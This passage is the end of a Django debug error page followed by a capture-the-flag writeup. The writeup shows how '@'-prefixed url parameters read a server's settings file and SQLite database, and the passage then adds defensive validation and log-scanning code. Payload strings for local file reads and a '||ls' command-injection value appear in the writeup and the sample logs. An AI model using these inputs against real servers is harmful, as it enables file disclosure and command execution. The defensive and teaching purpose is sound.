        <th>Setting</th>
        <th>Value</th>
      </tr>
    </thead>
    <tbody>
      
        <tr>
          <td>ABSOLUTE_URL_OVERRIDES</td>
          <td class="code"><pre>{}</pre></td>
        </tr>
      
        <tr>
          <td>ADMINS</td>
          <td class="code"><pre>[]</pre></td>
        </tr>
      
        <tr>
          <td>ALLOWED_HOSTS</td>
          <td class="code"><pre>[]</pre></td>
        </tr>
      
        <tr>
          <td>APPEND_SLASH</td>
          <td class="code"><pre>True</pre></td>
        </tr>
      
        <tr>
          <td>AUTHENTICATION_BACKENDS</td>
          <td class="code"><pre>[u&#39;django.contrib.auth.backends.ModelBackend&#39;]</pre></td>
        </tr>
      
        <tr>
          <td>AUTH_PASSWORD_VALIDATORS</td>
          <td class="code"><pre>u&#39;********************&#39;</pre></td>
        </tr>
      
        <tr>
          <td>AUTH_USER_MODEL</td>
          <td class="code"><pre>u&#39;auth.User&#39;</pre></td>
        </tr>
      
        <tr>
          <td>BASE_DIR</td>
          <td class="code"><pre>&#39;/opt/api&#39;</pre></td>
        </tr>
      
        <tr>
          <td>CACHES</td>
          <td class="code"><pre>{u&#39;default&#39;: {u&#39;BACKEND&#39;: u&#39;django.core.cache.backends.locmem.LocMemCache&#39;}}</pre></td>
        </tr>
      
        <tr>
          <td>CACHE_MIDDLEWARE_ALIAS</td>
          <td class="code"><pre>u&#39;default&#39;</pre></td>
        </tr>
      
        <tr>
          <td>CACHE_MIDDLEWARE_KEY_PREFIX</td>
          <td class="code"><pre>u&#39;********************&#39;</pre></td>
        </tr>
      
        <tr>
          <td>CACHE_MIDDLEWARE_SECONDS</td>
          <td class="code"><pre>600</pre></td>
        </tr>
      
        <tr>
          <td>CSRF_COOKIE_AGE</td>
          <td class="code"><pre>31449600</pre></td>
        </tr>
      
        <tr>
          <td>CSRF_COOKIE_DOMAIN</td>
          <td class="code"><pre>None</pre></td>
        </tr>
      
        <tr>
          <td>CSRF_COOKIE_HTTPONLY</td>
          <td class="code"><pre>False</pre></td>
        </tr>
      
        <tr>
          <td>CSRF_COOKIE_NAME</td>
          <td class="code"><pre>u&#39;csrftoken&#39;</pre></td>
        </tr>
      
        <tr>
          <td>CSRF_COOKIE_PATH</td>
          <td class="code"><pre>u&#39;/&#39;</pre></td>
        </tr>
      
        <tr>
          <td>CSRF_COOKIE_SECURE</td>
          <td class="code"><pre>False</pre></td>
        </tr>
      
        <tr>
          <td>CSRF_FAILURE_VIEW</td>
          <td class="code"><pre>u&#39;django.views.csrf.csrf_failure&#39;</pre></td>
        </tr>
      
        <tr>
          <td>CSRF_HEADER_NAME</td>
          <td class="code"><pre>u&#39;HTTP_X_CSRFTOKEN&#39;</pre></td>
        </tr>
      
        <tr>
          <td>CSRF_TRUSTED_ORIGINS</td>
          <td class="code"><pre>[]</pre></td>
        </tr>
      
        <tr>
          <td>DATABASES</td>
          <td class="code"><pre>{&#39;default&#39;: {&#39;ATOMIC_REQUESTS&#39;: False,
             &#39;AUTOCOMMIT&#39;: True,
             &#39;CONN_MAX_AGE&#39;: 0,
             &#39;ENGINE&#39;: &#39;django.db.backends.sqlite3&#39;,
             &#39;HOST&#39;: &#39;&#39;,
             &#39;NAME&#39;: &#39;/opt/api/database.sqlite3&#39;,
             &#39;OPTIONS&#39;: {},
             &#39;PASSWORD&#39;: u&#39;********************&#39;,
             &#39;PORT&#39;: &#39;&#39;,
             &#39;TEST&#39;: {&#39;CHARSET&#39;: None,
                      &#39;COLLATION&#39;: None,
                      &#39;MIRROR&#39;: None,
                      &#39;NAME&#39;: None},
             &#39;TIME_ZONE&#39;: None,
             &#39;USER&#39;: &#39;&#39;}}</pre></td>
        </tr>
      
        <tr>
          <td>DATABASE_ROUTERS</td>
          <td class="code"><pre>[]</pre></td>
        </tr>
      
        <tr>
          <td>DATA_UPLOAD_MAX_MEMORY_SIZE</td>
          <td class="code"><pre>2621440</pre></td>
        </tr>
      
        <tr>
          <td>DATA_UPLOAD_MAX_NUMBER_FIELDS</td>
          <td class="code"><pre>1000</pre></td>
        </tr>
      
        <tr>
          <td>DATETIME_FORMAT</td>
          <td class="code"><pre>u&#39;N j, Y, P&#39;</pre></td>
        </tr>
      
        <tr>
          <td>DATETIME_INPUT_FORMATS</td>
          <td class="code"><pre>[u&#39;%Y-%m-%d %H:%M:%S&#39;,
 u&#39;%Y-%m-%d %H:%M:%S.%f&#39;,
 u&#39;%Y-%m-%d %H:%M&#39;,
 u&#39;%Y-%m-%d&#39;,
 u&#39;%m/%d/%Y %H:%M:%S&#39;,
 u&#39;%m/%d/%Y %H:%M:%S.%f&#39;,
 u&#39;%m/%d/%Y %H:%M&#39;,
 u&#39;%m/%d/%Y&#39;,
 u&#39;%m/%d/%y %H:%M:%S&#39;,
 u&#39;%m/%d/%y %H:%M:%S.%f&#39;,
 u&#39;%m/%d/%y %H:%M&#39;,
 u&#39;%m/%d/%y&#39;]</pre></td>
        </tr>
      
        <tr>
          <td>DATE_FORMAT</td>
          <td class="code"><pre>u&#39;N j, Y&#39;</pre></td>
        </tr>
      
        <tr>
          <td>DATE_INPUT_FORMATS</td>
          <td class="code"><pre>[u&#39;%Y-%m-%d&#39;,
 u&#39;%m/%d/%Y&#39;,
 u&#39;%m/%d/%y&#39;,
 u&#39;%b %d %Y&#39;,
 u&#39;%b %d, %Y&#39;,
 u&#39;%d %b %Y&#39;,
 u&#39;%d %b, %Y&#39;,
 u&#39;%B %d %Y&#39;,
 u&#39;%B %d, %Y&#39;,
 u&#39;%d %B %Y&#39;,
 u&#39;%d %B, %Y&#39;]</pre></td>
        </tr>
      
        <tr>
          <td>DEBUG</td>
          <td class="code"><pre>True</pre></td>
        </tr>
      
        <tr>
          <td>DEBUG_PROPAGATE_EXCEPTIONS</td>
          <td class="code"><pre>False</pre></td>
        </tr>
      
        <tr>
          <td>DECIMAL_SEPARATOR</td>
          <td class="code"><pre>u&#39;.&#39;</pre></td>
        </tr>
      
        <tr>
          <td>DEFAULT_CHARSET</td>
          <td class="code"><pre>u&#39;utf-8&#39;</pre></td>
        </tr>
      
        <tr>
          <td>DEFAULT_CONTENT_TYPE</td>
          <td class="code"><pre>u&#39;text/html&#39;</pre></td>
        </tr>
      
        <tr>
          <td>DEFAULT_EXCEPTION_REPORTER_FILTER</td>
          <td class="code"><pre>u&#39;django.views.debug.SafeExceptionReporterFilter&#39;</pre></td>
        </tr>
      
        <tr>
          <td>DEFAULT_FILE_STORAGE</td>
          <td class="code"><pre>u&#39;django.core.files.storage.FileSystemStorage&#39;</pre></td>
        </tr>
      
        <tr>
          <td>DEFAULT_FROM_EMAIL</td>
          <td class="code"><pre>u&#39;webmaster@localhost&#39;</pre></td>
        </tr>
      
        <tr>
          <td>DEFAULT_INDEX_TABLESPACE</td>
          <td class="code"><pre>u&#39;&#39;</pre></td>
        </tr>
      
        <tr>
          <td>DEFAULT_TABLESPACE</td>
          <td class="code"><pre>u&#39;&#39;</pre></td>
        </tr>
      
        <tr>
          <td>DISALLOWED_USER_AGENTS</td>
          <td class="code"><pre>[]</pre></td>
        </tr>
      
        <tr>
          <td>EMAIL_BACKEND</td>
          <td class="code"><pre>u&#39;django.core.mail.backends.smtp.EmailBackend&#39;</pre></td>
        </tr>
      
        <tr>
          <td>EMAIL_HOST</td>
          <td class="code"><pre>u&#39;localhost&#39;</pre></td>
        </tr>
      
        <tr>
          <td>EMAIL_HOST_PASSWORD</td>
          <td class="code"><pre>u&#39;********************&#39;</pre></td>
        </tr>
      
        <tr>
          <td>EMAIL_HOST_USER</td>
          <td class="code"><pre>u&#39;&#39;</pre></td>
        </tr>
      
        <tr>
          <td>EMAIL_PORT</td>
          <td class="code"><pre>25</pre></td>
        </tr>
      
        <tr>
          <td>EMAIL_SSL_CERTFILE</td>
          <td class="code"><pre>None</pre></td>
        </tr>
      
        <tr>
          <td>EMAIL_SSL_KEYFILE</td>
          <td class="code"><pre>u&#39;********************&#39;</pre></td>
        </tr>
      
        <tr>
          <td>EMAIL_SUBJECT_PREFIX</td>
          <td class="code"><pre>u&#39;[Django] &#39;</pre></td>
        </tr>
      
        <tr>
          <td>EMAIL_TIMEOUT</td>
          <td class="code"><pre>None</pre></td>
        </tr>
      
        <tr>
          <td>EMAIL_USE_SSL</td>
          <td class="code"><pre>False</pre></td>
        </tr>
      
        <tr>
          <td>EMAIL_USE_TLS</td>
          <td class="code"><pre>False</pre></td>
        </tr>
      
        <tr>
          <td>FILE_CHARSET</td>
          <td class="code"><pre>u&#39;utf-8&#39;</pre></td>
        </tr>
      
        <tr>
          <td>FILE_UPLOAD_DIRECTORY_PERMISSIONS</td>
          <td class="code"><pre>None</pre></td>
        </tr>
      
        <tr>
          <td>FILE_UPLOAD_HANDLERS</td>
          <td class="code"><pre>[u&#39;django.core.files.uploadhandler.MemoryFileUploadHandler&#39;,
 u&#39;django.core.files.uploadhandler.TemporaryFileUploadHandler&#39;]</pre></td>
        </tr>
      
        <tr>
          <td>FILE_UPLOAD_MAX_MEMORY_SIZE</td>
          <td class="code"><pre>2621440</pre></td>
        </tr>
      
        <tr>
          <td>FILE_UPLOAD_PERMISSIONS</td>
          <td class="code"><pre>None</pre></td>
        </tr>
      
        <tr>
          <td>FILE_UPLOAD_TEMP_DIR</td>
          <td class="code"><pre>None</pre></td>
        </tr>
      
        <tr>
          <td>FIRST_DAY_OF_WEEK</td>
          <td class="code"><pre>0</pre></td>
        </tr>
      
        <tr>
          <td>FIXTURE_DIRS</td>
          <td class="code"><pre>[]</pre></td>
        </tr>
      
        <tr>
          <td>FORCE_SCRIPT_NAME</td>
          <td class="code"><pre>None</pre></td>
        </tr>
      
        <tr>
          <td>FORMAT_MODULE_PATH</td>
          <td class="code"><pre>None</pre></td>
        </tr>
      
        <tr>
          <td>IGNORABLE_404_URLS</td>
          <td class="code"><pre>[]</pre></td>
        </tr>
      
        <tr>
          <td>INSTALLED_APPS</td>
          <td class="code"><pre>[&#39;django.contrib.admin&#39;,
 &#39;django.contrib.auth&#39;,
 &#39;django.contrib.contenttypes&#39;,
 &#39;django.contrib.sessions&#39;,
 &#39;django.contrib.messages&#39;,
 &#39;django.contrib.staticfiles&#39;,
 &#39;dnsapi&#39;]</pre></td>
        </tr>
      
        <tr>
          <td>INTERNAL_IPS</td>
          <td class="code"><pre>[]</pre></td>
        </tr>
      
        <tr>
          <td>LANGUAGES</td>
          <td class="code"><pre>[(u&#39;af&#39;, u&#39;Afrikaans&#39;),
 (u&#39;ar&#39;, u&#39;Arabic&#39;),
 (u&#39;ast&#39;, u&#39;Asturian&#39;),
 (u&#39;az&#39;, u&#39;Azerbaijani&#39;),
 (u&#39;bg&#39;, u&#39;Bulgarian&#39;),
 (u&#39;be&#39;, u&#39;Belarusian&#39;),
 (u&#39;bn&#39;, u&#39;Bengali&#39;),
 (u&#39;br&#39;, u&#39;Breton&#39;),
 (u&#39;bs&#39;, u&#39;Bosnian&#39;),
 (u&#39;ca&#39;, u&#39;Catalan&#39;),
 (u&#39;cs&#39;, u&#39;Czech&#39;),
 (u&#39;cy&#39;, u&#39;Welsh&#39;),
 (u&#39;da&#39;, u&#39;Danish&#39;),
 (u&#39;de&#39;, u&#39;German&#39;),
 (u&#39;dsb&#39;, u&#39;Lower Sorbian&#39;),
 (u&#39;el&#39;, u&#39;Greek&#39;),
 (u&#39;en&#39;, u&#39;English&#39;),
 (u&#39;en-au&#39;, u&#39;Australian English&#39;),
 (u&#39;en-gb&#39;, u&#39;British English&#39;),
 (u&#39;eo&#39;, u&#39;Esperanto&#39;),
 (u&#39;es&#39;, u&#39;Spanish&#39;),
 (u&#39;es-ar&#39;, u&#39;Argentinian Spanish&#39;),
 (u&#39;es-co&#39;, u&#39;Colombian Spanish&#39;),
 (u&#39;es-mx&#39;, u&#39;Mexican Spanish&#39;),
 (u&#39;es-ni&#39;, u&#39;Nicaraguan Spanish&#39;),
 (u&#39;es-ve&#39;, u&#39;Venezuelan Spanish&#39;),
 (u&#39;et&#39;, u&#39;Estonian&#39;),
 (u&#39;eu&#39;, u&#39;Basque&#39;),
 (u&#39;fa&#39;, u&#39;Persian&#39;),
 (u&#39;fi&#39;, u&#39;Finnish&#39;),
 (u&#39;fr&#39;, u&#39;French&#39;),
 (u&#39;fy&#39;, u&#39;Frisian&#39;),
 (u&#39;ga&#39;, u&#39;Irish&#39;),
 (u&#39;gd&#39;, u&#39;Scottish Gaelic&#39;),
 (u&#39;gl&#39;, u&#39;Galician&#39;),
 (u&#39;he&#39;, u&#39;Hebrew&#39;),
 (u&#39;hi&#39;, u&#39;Hindi&#39;),
 (u&#39;hr&#39;, u&#39;Croatian&#39;),
 (u&#39;hsb&#39;, u&#39;Upper Sorbian&#39;),
 (u&#39;hu&#39;, u&#39;Hungarian&#39;),
 (u&#39;ia&#39;, u&#39;Interlingua&#39;),
 (u&#39;id&#39;, u&#39;Indonesian&#39;),
 (u&#39;io&#39;, u&#39;Ido&#39;),
 (u&#39;is&#39;, u&#39;Icelandic&#39;),
 (u&#39;it&#39;, u&#39;Italian&#39;),
 (u&#39;ja&#39;, u&#39;Japanese&#39;),
 (u&#39;ka&#39;, u&#39;Georgian&#39;),
 (u&#39;kk&#39;, u&#39;Kazakh&#39;),
 (u&#39;km&#39;, u&#39;Khmer&#39;),
 (u&#39;kn&#39;, u&#39;Kannada&#39;),
 (u&#39;ko&#39;, u&#39;Korean&#39;),
 (u&#39;lb&#39;, u&#39;Luxembourgish&#39;),
 (u&#39;lt&#39;, u&#39;Lithuanian&#39;),
 (u&#39;lv&#39;, u&#39;Latvian&#39;),
 (u&#39;mk&#39;, u&#39;Macedonian&#39;),
 (u&#39;ml&#39;, u&#39;Malayalam&#39;),
 (u&#39;mn&#39;, u&#39;Mongolian&#39;),
 (u&#39;mr&#39;, u&#39;Marathi&#39;),
 (u&#39;my&#39;, u&#39;Burmese&#39;),
 (u&#39;nb&#39;, u&#39;Norwegian Bokm\xe5l&#39;),
 (u&#39;ne&#39;, u&#39;Nepali&#39;),
 (u&#39;nl&#39;, u&#39;Dutch&#39;),
 (u&#39;nn&#39;, u&#39;Norwegian Nynorsk&#39;),
 (u&#39;os&#39;, u&#39;Ossetic&#39;),
 (u&#39;pa&#39;, u&#39;Punjabi&#39;),
 (u&#39;pl&#39;, u&#39;Polish&#39;),
 (u&#39;pt&#39;, u&#39;Portuguese&#39;),
 (u&#39;pt-br&#39;, u&#39;Brazilian Portuguese&#39;),
 (u&#39;ro&#39;, u&#39;Romanian&#39;),
 (u&#39;ru&#39;, u&#39;Russian&#39;),
 (u&#39;sk&#39;, u&#39;Slovak&#39;),
 (u&#39;sl&#39;, u&#39;Slovenian&#39;),
 (u&#39;sq&#39;, u&#39;Albanian&#39;),
 (u&#39;sr&#39;, u&#39;Serbian&#39;),
 (u&#39;sr-latn&#39;, u&#39;Serbian Latin&#39;),
 (u&#39;sv&#39;, u&#39;Swedish&#39;),
 (u&#39;sw&#39;, u&#39;Swahili&#39;),
 (u&#39;ta&#39;, u&#39;Tamil&#39;),
 (u&#39;te&#39;, u&#39;Telugu&#39;),
 (u&#39;th&#39;, u&#39;Thai&#39;),
 (u&#39;tr&#39;, u&#39;Turkish&#39;),
 (u&#39;tt&#39;, u&#39;Tatar&#39;),
 (u&#39;udm&#39;, u&#39;Udmurt&#39;),
 (u&#39;uk&#39;, u&#39;Ukrainian&#39;),
 (u&#39;ur&#39;, u&#39;Urdu&#39;),
 (u&#39;vi&#39;, u&#39;Vietnamese&#39;),
 (u&#39;zh-hans&#39;, u&#39;Simplified Chinese&#39;),
 (u&#39;zh-hant&#39;, u&#39;Traditional Chinese&#39;)]</pre></td>
        </tr>
      
        <tr>
          <td>LANGUAGES_BIDI</td>
          <td class="code"><pre>[u&#39;he&#39;, u&#39;ar&#39;, u&#39;fa&#39;, u&#39;ur&#39;]</pre></td>
        </tr>
      
        <tr>
          <td>LANGUAGE_CODE</td>
          <td class="code"><pre>&#39;en-us&#39;</pre></td>
        </tr>
      
        <tr>
          <td>LANGUAGE_COOKIE_AGE</td>
          <td class="code"><pre>None</pre></td>
        </tr>
      
        <tr>
          <td>LANGUAGE_COOKIE_DOMAIN</td>
          <td class="code"><pre>None</pre></td>
        </tr>
      
        <tr>
          <td>LANGUAGE_COOKIE_NAME</td>
          <td class="code"><pre>u&#39;django_language&#39;</pre></td>
        </tr>
      
        <tr>
          <td>LANGUAGE_COOKIE_PATH</td>
          <td class="code"><pre>u&#39;/&#39;</pre></td>
        </tr>
      
        <tr>
          <td>LOCALE_PATHS</td>
          <td class="code"><pre>[]</pre></td>
        </tr>
      
        <tr>
          <td>LOGGING</td>
          <td class="code"><pre>{}</pre></td>
        </tr>
      
        <tr>
          <td>LOGGING_CONFIG</td>
          <td class="code"><pre>u&#39;logging.config.dictConfig&#39;</pre></td>
        </tr>
      
        <tr>
          <td>LOGIN_REDIRECT_URL</td>
          <td class="code"><pre>u&#39;/accounts/profile/&#39;</pre></td>
        </tr>
      
        <tr>
          <td>LOGIN_URL</td>
          <td class="code"><pre>u&#39;/accounts/login/&#39;</pre></td>
        </tr>
      
        <tr>
          <td>LOGOUT_REDIRECT_URL</td>
          <td class="code"><pre>None</pre></td>
        </tr>
      
        <tr>
          <td>MANAGERS</td>
          <td class="code"><pre>[]</pre></td>
        </tr>
      
        <tr>
          <td>MEDIA_ROOT</td>
          <td class="code"><pre>u&#39;&#39;</pre></td>
        </tr>
      
        <tr>
          <td>MEDIA_URL</td>
          <td class="code"><pre>u&#39;&#39;</pre></td>
        </tr>
      
        <tr>
          <td>MESSAGE_STORAGE</td>
          <td class="code"><pre>u&#39;django.contrib.messages.storage.fallback.FallbackStorage&#39;</pre></td>
        </tr>
      
        <tr>
          <td>MIDDLEWARE</td>
          <td class="code"><pre>[&#39;django.middleware.security.SecurityMiddleware&#39;,
 &#39;django.contrib.sessions.middleware.SessionMiddleware&#39;,
 &#39;django.middleware.common.CommonMiddleware&#39;,
 &#39;django.contrib.auth.middleware.AuthenticationMiddleware&#39;,
 &#39;django.contrib.messages.middleware.MessageMiddleware&#39;,
 &#39;django.middleware.clickjacking.XFrameOptionsMiddleware&#39;]</pre></td>
        </tr>
      
        <tr>
          <td>MIDDLEWARE_CLASSES</td>
          <td class="code"><pre>[u&#39;django.middleware.common.CommonMiddleware&#39;,
 u&#39;django.middleware.csrf.CsrfViewMiddleware&#39;]</pre></td>
        </tr>
      
        <tr>
          <td>MIGRATION_MODULES</td>
          <td class="code"><pre>{}</pre></td>
        </tr>
      
        <tr>
          <td>MONTH_DAY_FORMAT</td>
          <td class="code"><pre>u&#39;F j&#39;</pre></td>
        </tr>
      
        <tr>
          <td>NUMBER_GROUPING</td>
          <td class="code"><pre>0</pre></td>
        </tr>
      
        <tr>
          <td>PASSWORD_HASHERS</td>
          <td class="code"><pre>u&#39;********************&#39;</pre></td>
        </tr>
      
        <tr>
          <td>PASSWORD_RESET_TIMEOUT_DAYS</td>
          <td class="code"><pre>u&#39;********************&#39;</pre></td>
        </tr>
      
        <tr>
          <td>PREPEND_WWW</td>
          <td class="code"><pre>False</pre></td>
        </tr>
      
        <tr>
          <td>ROOT_URLCONF</td>
          <td class="code"><pre>&#39;api.urls&#39;</pre></td>
        </tr>
      
        <tr>
          <td>SECRET_KEY</td>
          <td class="code"><pre>u&#39;********************&#39;</pre></td>
        </tr>
      
        <tr>
          <td>SECURE_BROWSER_XSS_FILTER</td>
          <td class="code"><pre>False</pre></td>
        </tr>
      
        <tr>
          <td>SECURE_CONTENT_TYPE_NOSNIFF</td>
          <td class="code"><pre>False</pre></td>
        </tr>
      
        <tr>
          <td>SECURE_HSTS_INCLUDE_SUBDOMAINS</td>
          <td class="code"><pre>False</pre></td>
        </tr>
      
        <tr>
          <td>SECURE_HSTS_SECONDS</td>
          <td class="code"><pre>0</pre></td>
        </tr>
      
        <tr>
          <td>SECURE_PROXY_SSL_HEADER</td>
          <td class="code"><pre>None</pre></td>
        </tr>
      
        <tr>
          <td>SECURE_REDIRECT_EXEMPT</td>
          <td class="code"><pre>[]</pre></td>
        </tr>
      
        <tr>
          <td>SECURE_SSL_HOST</td>
          <td class="code"><pre>None</pre></td>
        </tr>
      
        <tr>
          <td>SECURE_SSL_REDIRECT</td>
          <td class="code"><pre>False</pre></td>
        </tr>
      
        <tr>
          <td>SERVER_EMAIL</td>
          <td class="code"><pre>u&#39;root@localhost&#39;</pre></td>
        </tr>
      
        <tr>
          <td>SESSION_CACHE_ALIAS</td>
          <td class="code"><pre>u&#39;default&#39;</pre></td>
        </tr>
      
        <tr>
          <td>SESSION_COOKIE_AGE</td>
          <td class="code"><pre>1209600</pre></td>
        </tr>
      
        <tr>
          <td>SESSION_COOKIE_DOMAIN</td>
          <td class="code"><pre>None</pre></td>
        </tr>
      
        <tr>
          <td>SESSION_COOKIE_HTTPONLY</td>
          <td class="code"><pre>True</pre></td>
        </tr>
      
        <tr>
          <td>SESSION_COOKIE_NAME</td>
          <td class="code"><pre>u&#39;sessionid&#39;</pre></td>
        </tr>
      
        <tr>
          <td>SESSION_COOKIE_PATH</td>
          <td class="code"><pre>u&#39;/&#39;</pre></td>
        </tr>
      
        <tr>
          <td>SESSION_COOKIE_SECURE</td>
          <td class="code"><pre>False</pre></td>
        </tr>
      
        <tr>
          <td>SESSION_ENGINE</td>
          <td class="code"><pre>u&#39;django.contrib.sessions.backends.db&#39;</pre></td>
        </tr>
      
        <tr>
          <td>SESSION_EXPIRE_AT_BROWSER_CLOSE</td>
          <td class="code"><pre>False</pre></td>
        </tr>
      
        <tr>
          <td>SESSION_FILE_PATH</td>
          <td class="code"><pre>None</pre></td>
        </tr>
      
        <tr>
          <td>SESSION_SAVE_EVERY_REQUEST</td>
          <td class="code"><pre>False</pre></td>
        </tr>
      
        <tr>
          <td>SESSION_SERIALIZER</td>
          <td class="code"><pre>u&#39;django.contrib.sessions.serializers.JSONSerializer&#39;</pre></td>
        </tr>
      
        <tr>
          <td>SETTINGS_MODULE</td>
          <td class="code"><pre>&#39;api.settings&#39;</pre></td>
        </tr>
      
        <tr>
          <td>SHORT_DATETIME_FORMAT</td>
          <td class="code"><pre>u&#39;m/d/Y P&#39;</pre></td>
        </tr>
      
        <tr>
          <td>SHORT_DATE_FORMAT</td>
          <td class="code"><pre>u&#39;m/d/Y&#39;</pre></td>
        </tr>
      
        <tr>
          <td>SIGNING_BACKEND</td>
          <td class="code"><pre>u&#39;django.core.signing.TimestampSigner&#39;</pre></td>
        </tr>
      
        <tr>
          <td>SILENCED_SYSTEM_CHECKS</td>
          <td class="code"><pre>[]</pre></td>
        </tr>
      
        <tr>
          <td>STATICFILES_DIRS</td>
          <td class="code"><pre>[]</pre></td>
        </tr>
      
        <tr>
          <td>STATICFILES_FINDERS</td>
          <td class="code"><pre>[u&#39;django.contrib.staticfiles.finders.FileSystemFinder&#39;,
 u&#39;django.contrib.staticfiles.finders.AppDirectoriesFinder&#39;]</pre></td>
        </tr>
      
        <tr>
          <td>STATICFILES_STORAGE</td>
          <td class="code"><pre>u&#39;django.contrib.staticfiles.storage.StaticFilesStorage&#39;</pre></td>
        </tr>
      
        <tr>
          <td>STATIC_ROOT</td>
          <td class="code"><pre>None</pre></td>
        </tr>
      
        <tr>
          <td>STATIC_URL</td>
          <td class="code"><pre>&#39;/static/&#39;</pre></td>
        </tr>
      
        <tr>
          <td>TEMPLATES</td>
          <td class="code"><pre>[{&#39;APP_DIRS&#39;: True,
  &#39;BACKEND&#39;: &#39;django.template.backends.django.DjangoTemplates&#39;,
  &#39;DIRS&#39;: [],
  &#39;OPTIONS&#39;: {&#39;context_processors&#39;: [&#39;django.template.context_processors.debug&#39;,
                                     &#39;django.template.context_processors.request&#39;,
                                     &#39;django.contrib.auth.context_processors.auth&#39;,
                                     &#39;django.contrib.messages.context_processors.messages&#39;]}}]</pre></td>
        </tr>
      
        <tr>
          <td>TEST_NON_SERIALIZED_APPS</td>
          <td class="code"><pre>[]</pre></td>
        </tr>
      
        <tr>
          <td>TEST_RUNNER</td>
          <td class="code"><pre>u&#39;django.test.runner.DiscoverRunner&#39;</pre></td>
        </tr>
      
        <tr>
          <td>THOUSAND_SEPARATOR</td>
          <td class="code"><pre>u&#39;,&#39;</pre></td>
        </tr>
      
        <tr>
          <td>TIME_FORMAT</td>
          <td class="code"><pre>u&#39;P&#39;</pre></td>
        </tr>
      
        <tr>
          <td>TIME_INPUT_FORMATS</td>
          <td class="code"><pre>[u&#39;%H:%M:%S&#39;, u&#39;%H:%M:%S.%f&#39;, u&#39;%H:%M&#39;]</pre></td>
        </tr>
      
        <tr>
          <td>TIME_ZONE</td>
          <td class="code"><pre>&#39;UTC&#39;</pre></td>
        </tr>
      
        <tr>
          <td>USE_ETAGS</td>
          <td class="code"><pre>False</pre></td>
        </tr>
      
        <tr>
          <td>USE_I18N</td>
          <td class="code"><pre>True</pre></td>
        </tr>
      
        <tr>
          <td>USE_L10N</td>
          <td class="code"><pre>True</pre></td>
        </tr>
      
        <tr>
          <td>USE_THOUSAND_SEPARATOR</td>
          <td class="code"><pre>False</pre></td>
        </tr>
      
        <tr>
          <td>USE_TZ</td>
          <td class="code"><pre>True</pre></td>
        </tr>
      
        <tr>
          <td>USE_X_FORWARDED_HOST</td>
          <td class="code"><pre>False</pre></td>
        </tr>
      
        <tr>
          <td>USE_X_FORWARDED_PORT</td>
          <td class="code"><pre>False</pre></td>
        </tr>
      
        <tr>
          <td>WSGI_APPLICATION</td>
          <td class="code"><pre>&#39;api.wsgi.application&#39;</pre></td>
        </tr>
      
        <tr>
          <td>X_FRAME_OPTIONS</td>
          <td class="code"><pre>u&#39;SAMEORIGIN&#39;</pre></td>
        </tr>
      
        <tr>
          <td>YEAR_MONTH_FORMAT</td>
          <td class="code"><pre>u&#39;F Y&#39;</pre></td>
        </tr>
      
    </tbody>
  </table>

</div>

  <div id="explanation">
    <p>
      You're seeing this error because you have <code>DEBUG = True</code> in your
      Django settings file. Change that to <code>False</code>, and Django will
      display a standard page generated by the handler for this status code.
    </p>
  </div>

</body>
</html>

Since there is so much text, we will not go through it line by line; scrolling straight to the bottom, we find

the description of the Python module Django. The reason for the error is:

The Django error page shows that the input parameter was passed to the backend Django service for parsing, and Django had its encoding set to gbk, so a wide character (outside the ASCII range) was encoded incorrectly.

Following Django's directory layout,
we can check the error output for the configuration file settings.py to see whether it contains any database-related information:
?url=@/opt/api/api/settings.py 

 Visiting this URL, we find that the database is

sqlite3

 Using the database path found earlier, we construct the payload "url=@/opt/api/database.sqlite3", which successfully triggers the error page, and from the POST data shown in it we find the flag.

flag:

WHCTF{yoooo_Such_A_G00D_@}
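To close out the writeup from the defender's side, here is an added example (not the challenge's own code, and not taken from the Django project) of how the ping endpoint should have treated its input. It handles the two inputs that did the damage above: a non-ASCII byte (`%FF`) that a backend with a narrow encoding such as gbk cannot encode, and an `@`-prefixed value that the backend turned into a local file read. The same validator is then replayed over access-log lines so that a SOC can spot those requests. All function names, the log lines and the settings paths in the log are constructed for this example.

```python
"""Strict target validation for a ping-style endpoint, plus a log replay.

Added example, not the challenge's or Django's code. Names and sample data
are constructed for illustration.
"""
import ipaddress
import re
import subprocess
from urllib.parse import parse_qs, urlsplit

# RFC 1123 hostname label: letters, digits and hyphens, no leading or
# trailing hyphen, 1..63 chars. ASCII only, so a wide character never passes.
_LABEL = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")
# Request line inside a combined/common access-log entry (constructed format).
_REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


class InvalidTarget(ValueError):
    """Raised when a user-supplied ping target is rejected."""


def validate_ping_target(value: str) -> str:
    """Return the target in canonical form or raise InvalidTarget.

    Only a literal IPv4/IPv6 address or a plain ASCII hostname is accepted,
    so '127.0.0.1||ls', '@/opt/api/api/settings.py' or '\xff' are rejected
    before they reach a shell, a file-reading client or any text codec.
    """
    if not isinstance(value, str) or not value or len(value) > 253:
        raise InvalidTarget("empty or too long")
    if not value.isascii():
        raise InvalidTarget("non-ASCII character in target")
    try:  # literal IP address: let ipaddress do the strict parsing
        return str(ipaddress.ip_address(value))
    except ValueError:
        pass
    # Otherwise require a well-formed hostname. This also rules out a leading
    # '@' or '-', shell metacharacters, slashes and whitespace.
    labels = value.rstrip(".").split(".")
    if not all(_LABEL.match(label) for label in labels):
        raise InvalidTarget("not a valid hostname")
    return value.lower()


def is_valid_target(value: str) -> bool:
    """Boolean convenience wrapper around validate_ping_target."""
    try:
        validate_ping_target(value)
        return True
    except InvalidTarget:
        return False


def ping_argv(value: str) -> list:
    """Build the argv for ping. No shell is involved, so '||' and ';' are
    never interpreted even if validation were loosened later."""
    return ["ping", "-c", "1", validate_ping_target(value)]


def run_ping(value: str) -> int:
    """Run ping with the validated argument list (shell=False); return exit code."""
    return subprocess.run(ping_argv(value), capture_output=True, timeout=10).returncode


def suspicious_requests(log_lines):
    """Replay the validator over access-log lines and return
    (line_no, decoded_value, reason) for each 'url' parameter that would be
    rejected. parse_qs percent-decodes with errors='replace', so a lone %FF
    becomes U+FFFD and trips the ASCII check."""
    findings = []
    for number, line in enumerate(log_lines, 1):
        match = _REQUEST.search(line)
        if not match:
            continue
        query = urlsplit(match.group(1)).query
        for value in parse_qs(query, keep_blank_values=True).get("url", []):
            try:
                validate_ping_target(value)
            except InvalidTarget as exc:
                findings.append((number, value, str(exc)))
    return findings


# Constructed access-log lines modelled on the requests made in the writeup.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /api/ping?url=127.0.0.1 HTTP/1.1" 200 64',
    '10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /api/ping?url=127.0.0.1%7C%7Cls HTTP/1.1" 200 64',
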